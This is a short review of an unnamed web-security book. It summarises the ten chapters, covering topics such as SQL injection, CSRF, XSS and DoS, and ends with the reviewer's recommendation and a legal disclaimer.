General Overview
The book is about 250 pages long and consists of 10 chapters. It contains many code snippets and images. The reading difficulty level is light/medium.
Short Description
Let’s briefly review the book’s chapters.
Chapter 1. Fundamentals of Security.
Security fundamentals are briefly covered — from social engineering to DDoS attacks.
Chapter 2. Simple Hacking Methods.
Examples of building a proper voting system are presented, including the use of captcha.
Chapter 3. Hacking PHP Scripts.
Ways to hack PHP when receiving and processing URL parameters on the server are discussed. Other methods are also covered.
Chapter 4. Working with System Commands.
System command calls are explained. The topic of working with files (e.g., uploading to a server) is also touched upon.
Chapter 5. SQL Injection (PHP + MySQL).
Vulnerabilities in the browser’s URL bar and forms that are poorly filtered and processed are examined.
Chapter 6. SQL Injection (.NET + MS SQL Server).
Essentially the same, but applied to C#.
Chapter 7. CSRF, or XSRF Vulnerability.
The title speaks for itself: cross‑site attacks and ways to defend against them are examined.
Chapter 8. DoS Attack on a Website.
Distributed attacks aimed at exhausting system resources are described. Examples of web and server weak points are analyzed.
Chapter 9. Authorization.
Various simple authorization methods — from cookies to sessions — are examined, and the weaknesses of each approach are described.
Chapter 10. XSS.
It’s about intercepting data using JavaScript.
Opinion
By this point I had already read a dozen books on security and ways to attack and protect web servers and sites. With each new book the amount of new useful information for me dwindles, as the topics are the same, often treated superficially, and few people want to dive deeper and write detailed books on specific aspects.
Nevertheless, this book periodically fed me new information, and after finishing it I ended up with a 15‑page summary. That speaks to the book’s value even for me.
More broadly, without tying it to me personally, if you want to delve into information‑security topics and are not yet an expert, I definitely recommend this book for reading.
This text is exclusively a review of the book and is not a recommendation. The tools and methods described in the book are presented solely for informational purposes — this does not constitute a call to action on my part. Moreover, some technologies or practices may be restricted, blocked, or illegal in certain countries, and each individual should evaluate their use independently, considering local legislation and personal responsibility.
